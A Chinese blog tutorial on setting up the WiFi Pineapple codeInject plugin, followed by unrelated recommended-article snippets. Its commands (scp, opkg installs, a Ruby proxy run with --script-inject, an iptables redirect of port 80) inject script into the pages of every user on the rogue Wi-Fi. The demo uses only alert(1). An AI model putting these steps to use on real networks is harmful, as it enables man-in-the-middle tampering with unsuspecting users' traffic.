wifipineapple插件:codeInject的使用_dianyan5615的博客-程序员ITS301

  如果在中间人攻击的时候, 能在用户的网页中插入任意代码, 可以说已经完成一半了

  wifipineapple有个codeInject插件, 可以让连上这个网络所有设备浏览网页的时候, 在网页中插入任意html代码

  但是目前我用的wifipineapple版本是MK4, 官方很久不维护这个版本的wifipineapple

  使用scp把本地的codeinject传到wifipineapple的  /pineapple/components/infusions/目录下

scp -r codeinject [email protected]172.16.42.1:/pineapple/components/infusions

  然后把opkg的源改成:

http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages/

  执行

opkg update
opkg install ruby-cgi
opkg install ruby-core
opkg install ruby-enc
opkg install ruby-gems

  cd进入 /pineapple/components/infusions/codeinject 目录,修正ruby执行socket, getAddrInfo的错误:

cp includes/install/socket.so /usr/lib/ruby/1.9/mips-linux
ln -s /usb/usr/lib/ruby /usr/lib/ruby

  cd进入  /pineapple/components/infusions/codeinject/includes/proxy 目录, 执行命令:

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usb/lib:/usb/usr/lib
export PATH=$PATH:/usb/usr/bin:/usb/usr/sbin

ruby -Kn proxy.rb --verbose --script-inject "<script>alert(1)</script>"

  添加本地数据转发:

iptables -t nat -A PREROUTING  -i br-lan -p tcp --destination-port 80 -j REDIRECT --to-ports 8888

  此时连接上该wifi所有用户,浏览网页的时候,会弹出弹窗:1

EOF

作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830 

转载于:https://www.cnblogs.com/diligenceday/p/8023165.html

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dianyan5615/article/details/101881127

智能推荐

Java中定时任务的6种实现方式,你知道几种?_程序新视界的博客-程序员ITS301_java定时任务实现方式

几乎在所有的项目中,定时任务的使用都是不可或缺的,如果使用不当甚至会造成资损。还记得多年前在做金融系统时,出款业务是通过定时任务对外打款,当时由于银行接口处理能力有限,外加定时任务使用不当,导致发出大量重复出款请求。还好在后面环节将交易卡在了系统内部,未发生资损。所以,系统的学习一下定时任务,是非常有必要的。这篇文章就带大家整体梳理学习一下Java领域中常见的几种定时任务实现。线程等待实现先从最原始最简单的方式来讲解。可以先创建一个thread,然后让它在while循环里一直运行着,通过sleep方法

DeepLearning | 经典卷积神经网络Alex_Net (完整模型与tensorflow代码讲解,附数据集)_Liangjun_Feng的博客-程序员ITS301_alex卷积神经网络模型

最近复现了几个经典的卷积网络,拿自己的数据集试了了试,不得不承认的是卷积神经网络在图像处理方面确实有着得天独厚的优势,写这篇博客讲述早期最经典的卷积神经网络Alex_Net以及附上一些自己的理解2012年,Hinton的学生在ILSVRC 2012中以显著的优势赢得了比赛,top-5的错误率降低至了16.4%,相比于第二名的26.2%有了巨大的提升,这可以说是神经网络在低谷期以后的第一次发声,...

Apache Shiro身份认证过程详解_追寻上飞的博客-程序员ITS301_shiro身份验证过程

花了两天时间认真、重点走读==Apache Shiro安全框架==`身份认证`的源码,`访问控制`和前者是结构对应的,架构之美体现在对称和简易上。这个框架也让我想起业界优秀的网络框架`Netty`,优雅地描述了网络模型,它的优雅不仅体现在`ServerSocket`和`Socket`的对称之美,还体现在简化了一系列配置极简之美。

二、http请求网络的接口(比较有用的工具,尤其是在多线程的时候)_幢一幢的博客-程序员ITS301

http请求网络的接口(比较有用的工具,尤其是在多线程的时候)

鸿蒙810 980,稳了!鸿蒙系统升级名单再曝:至少麒麟980机型都能升级_守正出奇才的博客-程序员ITS301

此前根据大V长安数码君的消息,我们确认了荣耀9X系统会在年内升级到鸿蒙系统,这无疑是一件激动人心的事。要知道现在荣耀已经分了出去,很多人担心之前荣耀手机的系统更新会不会就此被抛弃了,比如无缘鸿蒙系统。不过现在这事可以说基本不用担心了,部分荣耀机型依旧是可以升级到鸿蒙系统的,就是时间问题而已。此外荣耀9X的销量也很给力,因此有着大批量的用户,鸿蒙也是需要这些用户来打基础的!而在昨天,又是这个博主给我...

Python可视化——matplotlib学习笔记(数学建模赛前准备)_机灵的天使的博客-程序员ITS301

Matplotlib笔记1.绘制折线图基本操作设置线条宽度,颜色添加x y轴名称设置字体(封装成字典),解决中文无法识别的问题添加标题保存图片import matplotlib.pyplot as plt#指定要绘制的点的横纵坐标(大小必须相同)x = [1,2,3,4,5]y = [1,4,9,16,25]#设置字体,解决中文无法识别的问题font_title = { 'family':'FangSong', 'weight':'bold',

随便推点

Nginx的下载和安装_安之若素、岁月静好的博客-程序员ITS301_nginx pcre下载

一、 下载和安装下载地址(windows版,linux版):http://nginx.org/en/download.html 1.16.0版本1.1 windows版不需安装,直接启动:双击,访问地址http://localhost,看到欢迎页面(通过工具nginx GUI Admin启动)注意:目录里不能带有中文字符Nginx-|_ conf 配置目录|_ contrib|_ docs 文档目录|_ logs 日志目录|_ temp 临时文件目录|_ html

在MySQL中填数据,如何在mysql中填充数据_weixin_39942474的博客-程序员ITS301

usually when i run this query it would always fetch all of the data in the table. but now its just taking a row of the data in the table.Im trying to export the data to Microsoft Wor by using phpword....

海康一体机调用接口_夜慬凉的博客-程序员ITS301

场景:java调用海康一体机下发卡pom依赖:&lt;dependency&gt; &lt;groupId&gt;examples&lt;/groupId&gt; &lt;artifactId&gt;examples&lt;/artifactId&gt; &lt;version&gt;1.0.0&lt;/version&gt; &lt;systemPath&gt;${lib.path}/examples.

常见加密算法分,用途,原理以及比较_tang_fu的博客-程序员ITS301_加密算法的介绍

<br />一.          密码学简介<br />据记载,公元前400年,古希腊人发明了置换密码。1881年世界上的第一个电话保密专利出现。在第二次世界大战期间,德国军方启用“恩尼格玛”密码机,密码学在战争中起着非常重要的作用。<br />随着信息化和数字化社会的发展,人们对信息安全和保密的重要性认识不断提高,于是在1997年,美国国家标准局公布实施了“美国数据加密标准(DES)”,民间力量开始全面介入密码学的研究和应用中,采用的加密算法有DES、RSA、SHA等。随着对加密强度需求的不断提高,近期

基于 Prometheus 的边缘计算监控实践_火山引擎边缘云的博客-程序员ITS301

监控作为边缘计算基础设施的重要组成部分,是边缘稳定性的基本保障。本文主要介绍火山引擎边缘计算的监控实践,分享火山引擎如何进行监控技术选型以及构建监控服务体系。

【MySQL - 5】约束是什么?非空约束、唯一约束、主键约束、外键约束有什么作用?_Beeemo的博客-程序员ITS301

1. 非空约束2. 唯一约束3. 主键约束自动增长4. 外键约束级联操作首先我们来想象一下,前几篇文章在我们操作数据库的过程中,自由度是很高的,想给哪个赋值就给哪个赋值,但是这样子,就会造成我们所创建的数据库数据不完整,例如我创建一个学生信息表,你可能添加时候忘了添加学号、忘了添加名字、忘了添加成绩等等,因此我们就需要利用约束来创建我们的表,对表中的数据进行限定,保证数据的正确性、有效性和完整性

推荐文章

热门文章

相关标签